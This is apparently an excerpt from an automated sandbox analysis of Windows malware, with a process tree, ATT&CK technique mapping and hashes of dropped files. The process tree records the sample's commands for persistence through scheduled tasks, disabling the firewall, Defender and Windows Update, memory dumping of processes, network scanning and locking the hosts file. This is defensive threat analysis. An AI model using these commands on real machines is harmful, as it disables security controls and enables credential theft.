- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "agrlckqtl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "agrlckqtl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "taezwrbgz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "taezwrbgz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1892
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3008
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1564
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2240
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2808
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5076
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3660
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1776
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4708
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4516
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3568
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:944
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3836
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1784
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2828
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3652
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 792 C:\Windows\TEMP\baerflpsi\792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:976
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:3132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1812
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1212
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:4052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4288
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:2788
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:468
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4256
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 384 C:\Windows\TEMP\baerflpsi\384.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4312
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2104 C:\Windows\TEMP\baerflpsi\2104.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1184
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2700 C:\Windows\TEMP\baerflpsi\2700.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1584
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2936 C:\Windows\TEMP\baerflpsi\2936.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3352
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2960 C:\Windows\TEMP\baerflpsi\2960.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3688
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 784 C:\Windows\TEMP\baerflpsi\784.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3440
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 3772 C:\Windows\TEMP\baerflpsi\3772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4072
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 3868 C:\Windows\TEMP\baerflpsi\3868.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 3932 C:\Windows\TEMP\baerflpsi\3932.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 4020 C:\Windows\TEMP\baerflpsi\4020.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 1616 C:\Windows\TEMP\baerflpsi\1616.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2204 C:\Windows\TEMP\baerflpsi\2204.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2452 C:\Windows\TEMP\baerflpsi\2452.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4912
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 4876 C:\Windows\TEMP\baerflpsi\4876.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2996 C:\Windows\TEMP\baerflpsi\2996.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 2944 C:\Windows\TEMP\baerflpsi\2944.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3624
- C:\Windows\TEMP\baerflpsi\stiattrir.exe
  C:\Windows\TEMP\baerflpsi\stiattrir.exe -accepteula -mp 1908 C:\Windows\TEMP\baerflpsi\1908.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\baerflpsi\ngfqdelbf\scan.bat
  2⤵
  PID:1772
- - C:\Windows\baerflpsi\ngfqdelbf\dbqlbfrvt.exe
    dbqlbfrvt.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5976
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3508
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2296

C:\Windows\SysWOW64\wooakm.exe
C:\Windows\SysWOW64\wooakm.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2428

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F
1⤵
PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4008
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F
  2⤵
  PID:3952

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iacqttm.exe
1⤵
PID:2256
- C:\Windows\ime\iacqttm.exe
  C:\Windows\ime\iacqttm.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1112

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F
1⤵
PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2788
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F
  2⤵
  PID:2984

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F
1⤵
PID:5332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1612
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F
  2⤵
  PID:5292

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F
1⤵
PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5216
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F
  2⤵
  PID:3824

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iacqttm.exe
1⤵
PID:1160
- C:\Windows\ime\iacqttm.exe
  C:\Windows\ime\iacqttm.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\baerflpsi\1616.dmp

Filesize
25.9MB

MD5
be71f2e9b3f6c26fe08682d246cd6a6e

SHA1
2989c9c19546f302acf6f503e03aadc2841fc963

SHA256
90ac43b087a42ac8000312ff0e94318a6770198543f91dec2a2f836e0f9fcda5

SHA512
f507e35f721bd38b2a251302788d20191304945b3c743d0e93726560de4c0d730341ae85f7a2c50b1ca103b48d3984f99e47beca93ec9319b6d2883195b8e3bf

Download Submit
C:\Windows\TEMP\baerflpsi\2104.dmp

Filesize
4.1MB

MD5
61d9e30d7c0c9c645c08fa520e347d54

SHA1
1799713d7ea247b44c530ef0c97e479d8fd82d82

SHA256
511208a0923234ea42e2c3bd1bd2d60ad130fbba4dba5c31de05d11d8f74fde4

SHA512
0eb7640069c3d2cf6bdb7abdcb396f1b8d042c2bfb1408004cb547727e4281f0163ef6d3db2d5c68caa154787b77d7b52cb758010c30969641b4dc174915f08c

Download Submit
C:\Windows\TEMP\baerflpsi\2204.dmp

Filesize
1.2MB

MD5
09206c892894c06182726b4fba22b9f9

SHA1
1f53f34e8ac66e45d8a57ec367e35cbf8cdafb57

SHA256
3f7fce24201bb799f24e0c06dc259067b5ef439962b3b1db69aca5e8a5d74f01

SHA512
ecc594478bf83856db4676904c03a4dab5f4fd299c8e81d70e9291bf8830aaae57f73501a882f132629ce7cdff97af17640a32ab67af78937e8d1ec54bf8062c

Download Submit
C:\Windows\TEMP\baerflpsi\2452.dmp

Filesize
8.5MB

MD5
6295326b94203c2eeae48f6fc2fe5f43

SHA1
a2eeb412a208515a26759095a560fe99f4ddc90c

SHA256
1d94d956f12747984d6b2e1747755700312ffbd27433762c876b531fb4a47a30

SHA512
7c8e42c154cf215ad5753917a1a2253789e8a3d0ff609906af551a2670c22de46c8c83a804d1ea64ee5911018bf297ff25a7f70db9794a6aec940fbc5b364e2e

Download Submit
C:\Windows\TEMP\baerflpsi\2700.dmp

Filesize
7.6MB

MD5
0ac7fbae24b5e598cd081f22f88af1c2

SHA1
e8f0eae5330592e8005d228d1b9d06974a8e5cf6

SHA256
dc6ce403a19b935cbe2b6137a7bbc6029a9cb0ce0908ea0027bdba6d3439653c

SHA512
204dd697cc6d0d51b0eaa564b6f528b758dc656c1825e95f3b0f316dbcbbc51bb61799e73a625f2b43f34e83911c440963c56af76c956530e012a81c119244f2

Download Submit
C:\Windows\TEMP\baerflpsi\2936.dmp

Filesize
3.5MB

MD5
db08debd06e31b0e718cfc9448487ec6

SHA1
aaec96463c9defd8435111849d5235f1c6e56979

SHA256
c243f1c105f5361d8d09b2c857bb47e89ce37f177e534f9c40458eca490c3a4b

SHA512
1cec854465b4f4e003b91837471a84df9a6ff6f9059742e85f476edb386694f0dc1c7429d87e90c4a92049dc6dd20e7785df77f39aea40d2c5c144ce97ad5c45

Download Submit
C:\Windows\TEMP\baerflpsi\2960.dmp

Filesize
810KB

MD5
23c5e5620909f78278b6821133dd3249

SHA1
5234f9f48601f242213c5e0d3257dc14c7753608

SHA256
400ca415d642500a67f3d73b7f4a3ab68fc42fa071727f8d372d786ec88a92d5

SHA512
aa544322721b53b1577ecb1ad570c3c54fdb45cb4fecdddb659fbf8c756fbc1a7ac58db658d4b18a8510fb127759a792b78e927b88e87ccd4770c1de4cee6c78

Download Submit
C:\Windows\TEMP\baerflpsi\3772.dmp

Filesize
2.4MB

MD5
e8f3d5ceef08140f75e3370c2d890aa0

SHA1
9008f0d3a642fb5f7cf9890bfee4eb8fc76b8177

SHA256
5854b759d34d574dafec5b3dccca72c201f9eeea4e85a75549d14908b1821f4b

SHA512
06477b3133aba13877ca1d7019b76986ebcd45a543c2587e0f8cb83cedcad8e2398b6249213a3e080f6c57d757cef8c532fc352869c45f89be5ce4ec6fbed962

Download Submit
C:\Windows\TEMP\baerflpsi\384.dmp

Filesize
33.3MB

MD5
0aee9a18e468289baee7a24f2137243b

SHA1
f8f5f991202fb87671de282041977b82ccd2dd9d

SHA256
2ad81a5948f25e4db8d33256e1199f7943dd059272ceedf8f7b67794625dba27

SHA512
cc068f2e276243e6a81ba3ce8efbf037a1a5670468864c801f2071f8fe20b85a490210e37e545b19da6546fce973be06c37d353fcde81142de9982f000b62c16

Download Submit
C:\Windows\TEMP\baerflpsi\3868.dmp

Filesize
20.7MB

MD5
4a1a94fd3bf444605a3f79f898468eff

SHA1
8afc7f9a5f6acad5dee90dafbcf6a8ed6c4684e9

SHA256
28b2a0ff2a405a9b8b32fe0797e34cc7635a64f1329c2da8afd20e90f7c8f932

SHA512
82c3dcae7145beb0c3fd9f061983fbcdc841bed70310dcc6534590ab298c9e20781bf7b076142ff30d7994f70605d7140bfd8ef024c0951da69dfbd44a6cd207

Download Submit
C:\Windows\TEMP\baerflpsi\3932.dmp

Filesize
4.0MB

MD5
4abbe8457f29d01164722417f41459a0

SHA1
69d6dbe54dbd879090588a674bcfcb1643c5929e

SHA256
f0987fa35a3ff6ad953bb38c4aea2ce39a46e75ab1580e405a78dddadf27b061

SHA512
a3f0b8de4de3007205a643081080977f349fd65ab66e751686d7341d8b7a7f2735185eaf05ceae05317a8ae6a2eea6611b22e1e45ccdfe3ae6b60729c95ffc43

Download Submit
C:\Windows\TEMP\baerflpsi\4020.dmp

Filesize
43.8MB

MD5
f58e6c4f9353ad53b3361413dce824de

SHA1
0e4de7bfd508afe5405e59affac052aabecf01d3

SHA256
8bea340cd3ad838300461375903c80df21a6b8554abe9dbf52b80467af0698a2

SHA512
e58c2423363605629e754bef8bb1b9c382df1f68e3b2d42bfadba0eb83112943e12a273719e9121e77a5128c33aa553e696490e04e2d7710f0f54a585a07b5b8

Download Submit
C:\Windows\TEMP\baerflpsi\784.dmp

Filesize
2.9MB

MD5
f2fa5e1fdc7e95047e2cc3d478ccb174

SHA1
249fec7c99d1d4f7a018d8d2decf6f9be699a6c8

SHA256
fd354ec685a7bb90ca98198bd277e2a7fe415dfc1e5c5f53ce5b1515013e1e3e

SHA512
82f8a786afa9386ec16a9778b485e5a6657b4bfe3f10660612efeedc1b972b248e0425d7b294555ce56c32e1ca5a58ee488a0dd08a2d3b55ab0a7bbcc75f585b

Download Submit
C:\Windows\TEMP\baerflpsi\792.dmp

Filesize
1019KB

MD5
25dbab2aad00b927e92adc8af46c4667

SHA1
01f4d5623d5727d323077e20d4adb2ba60ee0e97

SHA256
a2e14d55a52f766d06e880cb4efa908ac0cfd9f26569487516ccbfc5f3091e50

SHA512
1d4b1bd25da6d282fb7cf8eebf25eda31ea00dc780d9984f895866ad32ee5182f386b6f4128bab29ae66b875465e373c7b0ea923bba3abebd7d58f207eb1704a

Download Submit
C:\Windows\TEMP\beegewark\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\baerflpsi\stiattrir.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\beegewark\rqwpbp.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nsb78F.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsb78F.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\baerflpsi\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\baerflpsi\ngfqdelbf\Result.txt

Filesize
342B

MD5
76bbb68759e2fe0a3169cd3dbbfaa879

SHA1
